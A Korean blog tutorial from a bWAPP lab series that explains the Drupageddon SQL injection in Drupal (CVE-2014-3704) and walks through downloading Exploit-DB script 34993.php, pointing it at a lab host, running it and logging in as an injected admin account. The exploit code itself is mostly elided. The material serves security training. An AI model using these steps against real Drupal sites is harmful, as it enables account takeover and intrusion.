정보보안(구버전)/ bWAPP 2019. 2. 25. 16:07
웹 해킹 bWAPP - 104. A9 - Using Known Vulnerable Components - Drupal SQL Injection(Drupageddon)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Using Known Vulnerable Components
- OWASP Top10 A9 - 알려진 취약점이 있는 구성 요소 사용
- 슈퍼유저 권한으로 운영되는 취약한 라이브러리/프레임워크, 기타 SW 모듈로 인한 데이터 유실 및 서버 권한 획득이
가능한 취약점이다.
2. Drupal
- [위키 백과 참조]
- PHP로 작성된 오픈 소스 콘텐츠 관리 프레임워크, 콘텐츠 관리 시스템, 블로그 엔진이다. 처음에는 게시판으로
만들었으나 여러 가지 유용한 기능을 추가하여 현재의 모습을 가지게 되었다.
- 7.32 이전의 Drupal 코어 7.x의 데이터베이스 추상화 API에있는 expandArguments 함수는 준비된 문을 올바르게
구성하지 않아 원격 공격자가 만들어진 키가있는 배열을 통해 SQL 인젝션 공격이 가능하다.
- CVE-2014-3704 취약점 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
3. Using Known Vulnerable Components - Drupal SQL Injection(Drupageddon)
- 이 시나리오는 SQL 인젝션을 실시하여 Drupal를 사용하는 웹페이지 ID/PASS를 획득하는 내용이다.
Ex1) Using Known Vulnerable Components - Drupal SQL Injection(Drupageddon) 이해
보안 레벨 선택 및 시나리오 선택
'Drupal' 클릭하면 Drupageddon 페이지가 열림
'Drupageddon' 로그인 페이지
'CVE-2014-3704'를 클릭하면 Expolit-DB 링크 사이트가 열림
'EXPLOIT-DB:34993' 취약점 링크 클릭
취약점 소스 코드 다운로드 실시
'파일 저장' 선택 -> '확인' 버튼 클릭
root@kali:~# cd Downloads/
root@kali:~/Downloads# ls
34993.php
'Drupageddon' URL 주소 확인
root@kali:~/Downloads# vi 34993.php
<?php
$url = 'http://192.168.20.205/drupal/'; <- 기본 주소를 'Drupageddon' URL 주소로 변경한다.
~ 중간 생략 ~
:wq! |
'34993.php' 실행
root@kali:~/Downloads# php 34993.php
http://192.168.20.205/drupal/user/loginroot@kali:~/Downloads# |
'admin/admin'으로 접속 실시
로그인 확인
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
웹해킹 104. A9 - bWAPP Using Known Vulnerable Components - Drupal SQL Injection(Drupageddon)